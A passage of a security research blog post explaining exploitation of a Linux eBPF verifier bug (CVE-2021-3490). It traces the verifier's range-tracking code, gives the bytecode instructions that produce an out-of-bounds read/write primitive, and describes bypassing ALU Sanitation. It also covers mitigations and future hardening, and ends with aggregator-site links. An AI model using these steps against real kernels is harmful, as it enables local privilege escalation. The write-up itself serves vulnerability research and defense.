Now, let’s look at how these bounds are updated when two registers are added together:

BPF_ALU64_REG(BPF_ADD, EXPLOIT_REG, UNKOWN_VALUE_REG)

First, in adjust_scalar_min_max_vals :

static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                                      struct bpf_insn *insn,
                                      struct bpf_reg_state 
                                             *dst_reg,
                                      struct bpf_reg_state src_reg)
{
  ...
    switch (opcode) {
        case BPF_ADD:
            scalar32_min_max_add(dst_reg, &src_reg);
            scalar_min_max_add(dst_reg, &src_reg);
            dst_reg->var_off = tnum_add(dst_reg->var_off, 
                                        src_reg.var_off);
            break;

...
}

The scalar add functions are called. Let’s look at the 32 bit case :

static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,
                                 struct bpf_reg_state *src_reg)
{
    s32 smin_val = src_reg->s32_min_value;
    s32 smax_val = src_reg->s32_max_value;
    u32 umin_val = src_reg->u32_min_value;
    u32 umax_val = src_reg->u32_max_value;

...
    if (dst_reg->u32_min_value + umin_val < umin_val ||
        dst_reg->u32_max_value + umax_val < umax_val) {
            dst_reg->u32_min_value = 0;
            dst_reg->u32_max_value = U32_MAX;
        } else {
            dst_reg->u32_min_value += umin_val;
            dst_reg->u32_max_value += umax_val;
        }
}

If the addition operation doesn’t overflow either of the bounds, the bounds of the destination and source register are simply added together. This will result in EXPLOIT_REG having new 32 bit bounds: u32_min_value = 2, u32_max_value = 2 !

Next, on line 11 in the above snippet of adjust_scalar_min_max_vals , tnum_add will be called and saved to var_off of the destination register. This function will return information from what is known after adding two tnum s together.

Our registers are EXPLOIT_REG : var_off = {0x100000000; value = 0x1} and UNKOWN_REG : var_off = {mask = 0xFFFFFFFF00000001; value = 0x0} . Because the upper 32 bits of UNKNOWN_REG are unknown, the upper 32 bits of the result will also be unknown. The same goes for the lowest bit - it could be either 0 or 1. Since the lowest bit of EXPLOIT_REG is known to be 1, the result of adding the two bits could be either 1 or 2. This means that the second lowest bit is also unknown. The rest of the bits are known to be 0 in both the destination and source. This leaves EXPLOIT_REG with var_off = {mask = 0xFFFFFFFF00000003; value = 0x0} .

Recall that we know that the verifier will now call three more functions that will affect the bounds of the destination register: __update_reg_bounds , __reg_deduce_bounds , and __reg_bound_offset .

In __update_reg32_bounds , where var32_off.value is var_off for the lower 32 bits of destination register EXPLOIT_REG :

reg->u32_min_value = max_t(u32, reg->u32_min_value,
                          (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
                         (u32)(var32_off.value | var32_off.mask));

Luckily, the bounds remain unchanged. Since 2 > 0 , the min bound remains the same. For the max bound, we are not comparing against var32_off.value = 0 , but var_off.value | var32_off.mask = 3 . So, since 2 < 3 , the max bound also remains the same. Similar logic applies to the signed bounds.

Since the signed and the unsigned 32 bit bounds are all equal, they are not modified by __reg32_deduce_bounds .

Last, in __reg_bound_offset , we have:

struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
                                     tnum_range(reg->u32_min_value,
                                     reg->u32_max_value));

Where var32_off will be set equal to the lower 32 bit component of var_off for our destination register, EXPLOIT_REG . Recall that since u32_min_value = u32_max_value, tnum_range will return a tnum that has a known constant value of 2, since the range only includes one integer value. Since the current var_off has a lower 32 bit mask = 0x3 , tnum_intersect returns in the lowest three bits as known and equal to 2!

After all that, we have EXPLOIT_REG with bounds: {u,s}32_min_value = {u,s}32_max_value = 2, var_off = {mask = 0xFFFFFFFF00000000; value = 0x2} . That is to say, a register with the lowest 32 bits are known and equal to 2. During runtime though, the register is equal to 1!

All that’s left to do is zero extend the lower 32 bits of the register and do a simple AND operation:

BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG)
BPF_ALU64_IMM(BPF_AND, EXPLOIT_REG, 1)

The verifier will now believe EXPLOIT_REG = 0 because 2 & 1 = 0 , but it will be equal to 1. We can now use this register to do OOB read/writes on eBPF map pointers.

ALU Sanitation

The strategy to bypass ALU Sanitation is excellently described in this blog by Manfred Paul. Here he details the LPE exploitation strategy he used in Pwn2Own 2020.

Interestingly, this bypass was not needed at the time of the 2020 competition. When testing my exploit, I found that it was failing on some newer (but still vulnerable) Ubuntu kernels. The reason was because I was not bypassing ALU Sanitation. During my initial research period I looked at many different public eBPF verifier exploits. Strangely, I didn’t see an ALU Sanitation bypass in any of them!

After some investigation I discovered the reason. There was an integer underflow bug was when calculating the alu_limit in the verifier. It was present until March 2021, and fixed in this commit [17].

The bug is triggered when alu_limit = 0 . An example case is doing a subtraction operation with a pointer at the start of a map.

The sanitation instruction that was patched in:

*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);

Subtracting 1 from 0 results in aux→alu_limit = 0xFFFFFFFF .

The strategy for eBPF exploits depends on modifying the bpf_map structure found in the memory chunk before the map’s memory. This is done by subtracting from a map pointer.

ALU Sanitation was rendered completely useless by this bug against exploits of this type, and it went unnoticed even though many PoCs were publicly available. Of course, ALU Sanitation can be easily bypassed regardless. The new implementation of ALU Sanitation is much more effective against these attacks, which I will go over in the Mitigations section.

Finishing Up the LPE

We have established the primitive, a register EXPLOIT_REG which the verifier believes to be 0 but is actually equal to 1 at runtime. The next steps are beautifully outlined in Manfred Paul’s blog post. You can check out the released PoC to see the implementation.

https://youtu.be/EtQieYKtTY8

Mitigations

Unprivileged eBPF

As mentioned in the introduction, running eBPF programs can be disallowed for unprivileged users by setting the sysctl knob kernel.unprivileged_bpf_disabled . In May 2021, a new kconfig knob, BPF_UNPRIV_DEFAULT_OFF , was introduced that sets the sysctl knob by default [7].

Enabling these configurations will protect against attacks by disallowing unprivileged users from [ab]using eBPF. However, this doesn’t mitigate the problem completely. A privileged user can still use the arbitrary kernel write in this exploit to bypass or disable kernel security modules like SELinux.

ALU Sanitation

As of April 2021, the implementation of ALU Sanitation has changed [15]. The new implementation helps mitigate attacks like the one demonstrated in this blog.

First, the way alu_limit is calculated has changed. Now, instead of using the position of the pointer register to compute it, the offset register is used instead. For example, suppose we have some register with unsigned bounds umax_value = 1, umin_value = 0. Then, the computed alu_limit = 1. This means that if the register is outside of those bounds during runtime, pointer arithmetic does not occur using that register.

Additionally, ALU sanitation now patches pointer operation instructions if the scalar register is known to be constant.

bool off_is_imm = tnum_is_const(off_reg->var_off);
alu_state |= off_is_imm ? BPF_ALU_IMMEDIATE : 0;
isimm = aux->alu_state & BPF_ALU_IMMEDIATE;
...
if (isimm) {
        *patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
    } else {
         // Patch alu_limit check instructions
         ....
     }

The above patch shows that the offset register is only checked against its alu_limit if is not known to be constant. If it is constant, the operation is patched with an immediate instruction using its constant value.

Here’s an example. Suppose we have the following instruction:

BPF_ALU64_REG(BPF_ADD, BPF_REG_2, EXPLOIT_REG)

Here, BPF_REG_2 contains a pointer to a map, and EXPLOIT_REG contains a register the verifier believes has a value of 0, but the runtime value is 1. The ALU Sanitation will apply a patch such that the effective instruction is:

BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0)

The intention is to mitigate against speculative execution side-channel vulnerabilities [16], but it also serves to thwart attack methods such as the one presented in this blog.

Sadly, this marks the end of an era for this elegant exploit primitive against the eBPF verifier. While this will make exploiting vulnerabilities like CVE-2021-3490 harder, I do not think this will be the end of exploitation with eBPF. I’ll discuss this further in the next section.

Future Considerations

Since the introduction of eBPF, there have been a number of privilege escalation attacks that leverage the technology. In addition to exploiting vulnerabilities in eBPF itself, it also represents a powerful primitive for exploiting other kernel vulnerabilities. While eBPF can be a great tool for developers, there’s still more work to be done to harden it further.

Despite the new mitigations discussed in the ALU Sanitation section, exploits like the one demonstrated in the DoS exploitation section will still work. Patching dead code branches with exit instructions instead of jump backwards would prevent these type of attacks.

An LPE exploit writeup by Qualys published in July 2021 uses a memory corruption vulnerability to overwrite an eBPF program buffer, which contains the eBPF bytecode for a loaded program. Instead of fooling the verifier, the program is valid and passes verification. The buffer is overwritten after verification but before JIT compilation to achieve OOB read/write capabilities [8]. As this exploit demonstrates, the window after validation and before JIT compilation is not small, and a race can be won to target a write. The eBPF program buffer memory should be marked read-only before verification, so that it can't be modified during verification, and stay read-only until JIT compilation. This would prevent eBPF from being used as a powerful primitive when exploiting kernel memory corruption vulnerabilities. This was first suggested byBrad Spengler in 2016 [9].

References

Acknowledgements

Manfred Paul, for the original vulnerability discovery, and the excellent writeup on exploiting CVE-2020-8835, an eBPF verifier vulnerability.

Simon Scannell, for a great eBPF fuzzing and exploitation writeup. As well as an excellent PoC exploiting CVE-2020-27194, another eBPF verifier vulnerability. I used this PoC to learn about eBPF bytecode and exploitation.

Andréa, for her excellent work helping with graphics and the publishing of this blog post.

InsanityBit and Grapl, for supporting this research.

Kernel Pwning with eBPF: a Love Story

Kernel Pwning with eBPF: a Love Story

eBPF: a Primer

Extended Berkeley Packet Filter: What is it?

eBPF Maps

The eBPF Verifier

Range Tracking

ALU Sanitation

The Vulnerability

Debugging eBPF Programs

Verifier Log Output

Runtime Debugging

Exploitation

Triggering the Vulnerability

Denial of Service (DoS)

Map Pointer Leak

Verifier Range Tracking Primitive

ALU Sanitation

Finishing Up the LPE

Mitigations

Unprivileged eBPF

ALU Sanitation

Future Considerations

Recommend

GitHub - Coroxx/EvilAnalytics: An elegant and powerfull alternative to GoogleAna...

Catching Errors in React with Error Boundaries

seL4 Integrity Enforcement Proved for RISC-V | microkerneldude

August 8-14, 1921

[2108.02547] Fairer Chess: A Reversal of Two Opening Moves in Chess Creates Bala...

CTF | 2021 巅峰极客网络安全技能挑战赛 WriteUp

Better Mousetraps (or Screw Drives) Don’t Always Win

高瓴多次押注企业服务，餐饮投资热已燃到了米饭丨投融周报

Introducing the non-radiating antenna

北京广电局多举措推进广播电视媒体融合发展

About Joyk